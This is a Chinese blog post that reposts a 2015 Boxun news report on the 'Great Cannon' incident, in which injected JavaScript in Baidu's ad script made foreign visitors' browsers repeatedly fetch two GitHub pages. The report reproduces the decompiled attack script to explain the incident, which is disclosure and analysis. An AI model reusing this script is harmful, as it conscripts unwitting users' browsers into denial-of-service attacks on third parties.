设万维读者为首页 万维读者网 -- 全球华人的精神家园 广告服务 联系我们 关于万维
 
首  页 新  闻 视  频 博  客 论  坛 分类广告 购  物
搜索>> 发表日志 控制面板 个人相册 给我留言
帮助 退出
 
清扬飞舞  
??  
我的名片
清扬
注册日期: 2007-09-05
访问总量: 86,105 次
点击查看我的个人资料
Calendar
我的公告栏
花与刺的敬语:枝上有花也有刺.花欣赏刺.刺保护花.
清扬飞舞
最新发布
· 关于新浪博客浏览出现的奇特状况
· 不解的天涯。。
· 玩
友好链接
· 夏天的雾:夏天的雾
· 意味:意味
· 甩了:先有甩掉付出之心,才有收
· 天宇:天宇的空间
分类目录
【生活随笔.】
· 关于新浪博客浏览出现的奇特状况
· 玩
【琴玄.韵律.:】
【现代艺术:鉴赏.】
【国画鉴赏:山水.人物】
【乐器.鉴赏.】
【书页:散文与诗】
【影像.图片:】
【装饰艺术世界.】
【书海寻珍.鉴赏】
【社会反光镜】
· 不解的天涯。。
【童趣(动画.卡通)】
【情感画册】
存档目录
03/01/2015 - 03/31/2015
11/01/2013 - 11/30/2013
05/01/2013 - 05/31/2013
04/01/2011 - 04/30/2011
12/01/2010 - 12/31/2010
11/01/2010 - 11/30/2010
08/01/2010 - 08/31/2010
09/01/2009 - 09/30/2009
08/01/2009 - 08/31/2009
07/01/2009 - 07/31/2009
06/01/2009 - 06/30/2009
05/01/2009 - 05/31/2009
04/01/2009 - 04/30/2009
03/01/2009 - 03/31/2009
02/01/2009 - 02/28/2009
01/01/2009 - 01/31/2009
12/01/2008 - 12/31/2008
11/01/2008 - 11/30/2008
10/01/2008 - 10/31/2008
09/01/2008 - 09/30/2008
08/01/2008 - 08/31/2008
07/01/2008 - 07/31/2008
06/01/2008 - 06/30/2008
05/01/2008 - 05/31/2008
04/01/2008 - 04/30/2008
03/01/2008 - 03/31/2008
02/01/2008 - 02/29/2008
01/01/2008 - 01/31/2008
12/01/2007 - 12/31/2007
11/01/2007 - 11/30/2007
10/01/2007 - 10/31/2007
09/01/2007 - 09/30/2007
发表评论
作者:
用户名: 密码: 您还不是博客/论坛用户?现在就注册!
     
评论:
关于新浪博客浏览出现的奇特状况
   

关于新浪博客浏览出现的奇特状况,我在解决问题的时候,搜索到这篇文章,和我点击浏览新浪博客首页任意博文出现的状况一摸一样。给新浪博客客服联系,都装聋作哑,没任何回复。

这是我浏览新浪博客时出现的状况,就照了下来。


message from webpage
WARNING:malicious javascript detected on this domain

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

 

中国的国家防火墙调用民间流量攻击境外网站
请看博讯热点:网络封锁和压制

(博讯北京时间2015年3月27日首发 - 支持此文作者/记者)

    26日9时(Pacific Daylight Time,北京时间27日12时)左右开始,从境外访问v.baidu.com的时候发现会出现Javascript alert出现的弹窗:

WARNING: malicious javascript detected on this domain 追查了一下发现是百度广告管家的js http://cbjs.baidu.com/js/m.js?_=1427431567741
在境外访问时被替换成一段特殊的js。详细请求和返回的js见:http://pastie.org/10056531

反编译后代码大致如下:
"document.write(" src='http://libs.baidu.com/jquery/2.0.0/jquery.min.js'>x3c/script>");!window.jQuery&&document.write(" src='http://code.jquery.com/jquery-latest.js'>x3c/script>");startime=(new
Date).getTime();var count=0;function unixtime(){var a=new Date;return
Date.UTC(a.getFullYear(),a.getMonth(),a.getDay(),a.getHours(),a.getMinutes(),a.getSeconds())/1E3}url_array=["https://github.com/greatfire/","https://github.com/cn-nytimes/"];NUM=url_array.length;function
r_send2(){var a=unixtime()%NUM;get(url_array[a])}function get(a){var
b;$.ajax({url:a,dataType:"script",timeout:1E4,cache:!0,beforeSend:function(){requestTime=(new
Date).getTime()},complete:function(){responseTime=(new
Date).getTime();b=Math.floor(responseTime-requestTime);3E5>responseTime-startime&&(r_send(b),count+=1)}})}function
r_send(a){setTimeout("r_send2()",a)}setTimeout("r_send2()",2E3);"

很明显看出两个攻击目标: https://github.com/greatfire/ 和 https://github.com/cn-nytimes/

大致的流程就是:

1. GFW把某些常见网站的JS替换成以上js

2. 全球各地访问国内网站时,相当于成为DoS的源(可能还有全国各地访问国外时,未经确认)

3. GitHub不堪重负,把 https://github.com/greatfire/ 和
https://github.com/cn-nytimes/ 的返回改成一个alert: WARNING: malicious
javascript detected on this domain (网站存在恶意JS代码调用)

当境外用户访问内置境内一些网站如百度的JS调用的网站时,中国的国家防火墙GFW将这部分调用替换成重定向至目标网站,以调用民用流量的方式,实现对目标网站的DDOS攻击。中国网络审查监测机构Greatfire和纽约时报中文网目前尚未就此作出回应。 [博讯首发,转载请注明出处]- 支持此文作者/记者()
4941430       

http://www.boxun.com/news/gb/china/2015/03/201503271431.shtml#.VRsCJkDD_IU

 
关于本站 | 广告服务 | 联系我们 | 招聘信息 | 网站导航 | 隐私保护
Copyright (C) 1998-2024. Creaders.NET. All Rights Reserved.